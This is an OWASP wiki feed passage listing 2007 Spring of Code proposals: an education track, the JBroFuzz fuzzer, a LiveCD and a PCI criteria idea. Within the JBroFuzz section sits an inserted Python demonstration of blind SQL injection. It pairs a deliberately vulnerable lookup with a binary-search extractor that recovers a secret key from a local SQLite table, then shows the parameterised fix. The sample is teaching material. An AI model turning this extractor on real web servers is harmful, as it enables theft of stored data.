Web Application Security Education and Awareness is needed throughout the entire organization; each area and level of an organization has specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. &lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Currently the project goals are to create Educational Tracks: &lt;br /&gt;
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past&lt;br /&gt;
* A &amp;quot;Web Application Security Primer&amp;quot; Track for beginners (4 hours) &lt;br /&gt;
* A &amp;quot;What developers should know on Web Application Security&amp;quot; Track for developers (4 hours) &lt;br /&gt;
&lt;br /&gt;
* '''Why you should be sponsored for the project''': &lt;br /&gt;
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.&lt;br /&gt;
&lt;br /&gt;
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my belief that awareness is an important cornerstone of building secure web applications, and this project will actively support that.&lt;br /&gt;
&lt;br /&gt;
If we are granted SpoC 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.&lt;br /&gt;
&lt;br /&gt;
* '''More details''': &lt;br /&gt;
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.&lt;br /&gt;
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.&lt;br /&gt;
&lt;br /&gt;
== Subere - OWASP JBroFuzz Project ==&lt;br /&gt;
&lt;br /&gt;
==== Overview ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.&lt;br /&gt;
&lt;br /&gt;
==== Fuzzing ==== &lt;br /&gt;
&lt;br /&gt;
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.&lt;br /&gt;
&lt;br /&gt;
==== Objectives ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addition of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab'''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab'''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing using HTTPClient'''&lt;br /&gt;
* '''Blind SQL Injection Fuzzing Tab'''&lt;br /&gt;
&lt;br /&gt;
At the same time, the following existing tabs need to be updated and made more robust (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs'''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue'''&lt;br /&gt;
* '''Update Generators file format'''&lt;br /&gt;
* '''Include SOAP and XML fuzzing'''&lt;br /&gt;
&lt;br /&gt;
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.&lt;br /&gt;
&lt;br /&gt;
==== Deliverables ==== &lt;br /&gt;
&lt;br /&gt;
Based on the above, the new code elements that will be added are as follows:&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute-force NTLM over HTTP/S.''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''&lt;br /&gt;
* '''Blind SQL Fuzzing Tab:''' ''Implement a tab that extracts information from a blind SQL injection point identified on a web server over HTTP/HTTPS.''&lt;br /&gt;
&lt;br /&gt;
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: &lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pick up potential fuzzing patterns.''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''&lt;br /&gt;
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''&lt;br /&gt;
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''&lt;br /&gt;
&lt;br /&gt;
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.&lt;br /&gt;
&lt;br /&gt;
==== Background ==== &lt;br /&gt;
&lt;br /&gt;
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community, with a total of approx. 5,000 downloads in the last few months. &lt;br /&gt;
&lt;br /&gt;
Coming from a strong Java background (5+ years), I decided to implement and release JBroFuzz in order to initially simplify penetration testing processes that relate to web application and network protocol fuzzing.&lt;br /&gt;
&lt;br /&gt;
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.&lt;br /&gt;
&lt;br /&gt;
==== Why should JBroFuzz be sponsored? ==== &lt;br /&gt;
&lt;br /&gt;
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.&lt;br /&gt;
&lt;br /&gt;
Keeping the code platform independent adds a huge advantage. &lt;br /&gt;
&lt;br /&gt;
Receiving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.&lt;br /&gt;
&lt;br /&gt;
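The Blind SQL Fuzzing Tab above is described only by its goal: pulling data out of an injection point that returns nothing but a yes/no difference. The following added example, not JBroFuzz code, shows the mechanics in Python against an in-memory SQLite table: a deliberately vulnerable lookup that concatenates input into the SQL text, a boolean oracle wrapped around it, and a per-character binary search that recovers a secret column. Beside it is the parameterised form of the same lookup, against which the identical extraction recovers nothing. The table, the secret value and the payload shape are constructed for the example.&lt;br /&gt;
&lt;br /&gt;
```python
import sqlite3

# Constructed sample database: one table, one row, one secret column.
SECRET_OWNER = "alice"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users (name, api_key) VALUES ('alice', 'k3y-S3cr3t')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, name):
    """Deliberately vulnerable: input is concatenated into the SQL text.
    The caller only learns whether a row matched, which is all a blind injection point gives."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def safe_lookup(conn, name):
    """Hardened form of the same lookup: the input travels as a bound parameter, never as SQL."""
    row = conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def oracle(lookup, conn, condition):
    """Ask the injection point one boolean question: the row matches only if `condition` is true."""
    payload = SECRET_OWNER + "' AND (" + condition + ") AND '1'='1"
    return lookup(conn, payload)


def secret_char_expr(pos):
    # Subquery for the 1-based character at `pos` of the target column.
    return "substr((SELECT api_key FROM users WHERE name='" + SECRET_OWNER + "')," + str(pos) + ",1)"


def extract_char(lookup, conn, pos):
    """Binary search over printable ASCII (32..126) for the code point at `pos`.
    BETWEEN is used so the payload needs no comparison operators; about 7 oracle calls per character."""
    lo, hi = 32, 126
    while lo != hi:
        mid = (lo + hi) // 2
        cond = "unicode(" + secret_char_expr(pos) + ") BETWEEN " + str(lo) + " AND " + str(mid)
        if oracle(lookup, conn, cond):
            hi = mid
        else:
            lo = mid + 1
    return chr(lo)


def extract_secret(lookup, conn, max_len=64):
    """Recover the secret column one character at a time; stops when substr() runs past the end.
    Against a parameterised lookup the first probe is false and the result is the empty string."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(lookup, conn, "length(" + secret_char_expr(pos) + ") = 1"):
            break
        out += extract_char(lookup, conn, pos)
    return out


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", repr(extract_secret(vulnerable_lookup, db)))
    print("parameterised:", repr(extract_secret(safe_lookup, db)))
```
&lt;br /&gt;
A ten-character value costs roughly 80 oracle calls plus one length probe per position, which is the request volume a tab of this kind automates and also what makes rate limiting and query logging useful detection points on the server side. The same loop works unchanged over HTTP once `lookup` is replaced by a function that sends the payload and maps the response (status, length or a marker string) to True/False.&lt;br /&gt;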
== Joshua Perrymon - OWASP LiveCD Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the second version of the OWASP LiveCD during this period.&lt;br /&gt;
The first version of the LiveCD is now available and includes many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security professionals to perform application testing and training. &lt;br /&gt;
&lt;br /&gt;
In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This should start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also include the wiki and ALL the tools developed for OWASP.&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the LiveCD:&lt;br /&gt;
* Complete OWASP branding&lt;br /&gt;
* Add OWASP wiki&lt;br /&gt;
* Add encryption capabilities&lt;br /&gt;
* Add more OWASP tools&lt;br /&gt;
* Add more pen-test tools such as: VoIP, RFID, Bluetooth, wireless, etc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP LiveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis, not once a year like other live CDs. The CD will also include specialty tools and documentation to perform VoIP, RFID, Bluetooth, and wireless security assessments.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
'''Mark Curphey – A Better Web Security Evaluation Criteria'''&lt;br /&gt;
&lt;br /&gt;
'''Problem''' &lt;br /&gt;
PCI DSS is attracting a lot of criticism for a lot of valid reasons.  &lt;br /&gt;
http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/&lt;br /&gt;
&lt;br /&gt;
http://blogs.csoonline.com/node/210&lt;br /&gt;
&lt;br /&gt;
http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html&lt;br /&gt;
&lt;br /&gt;
The list is of course long and not appropriate here...&lt;br /&gt;
&lt;br /&gt;
'''Solution and Deliverables'''&lt;br /&gt;
As opposed to continuing to say what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. This project would address the following:&lt;br /&gt;
&lt;br /&gt;
'''Standard''' &lt;br /&gt;
-The technical things people should care about&lt;br /&gt;
-The operational  / management things people should care about&lt;br /&gt;
'''Business Model''' &lt;br /&gt;
-A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc)&lt;br /&gt;
&lt;br /&gt;
Note:  This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete, but I think it is very important for the industry and potentially for OWASP.  I wanted to gauge the interest by first posting this.&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	</feed>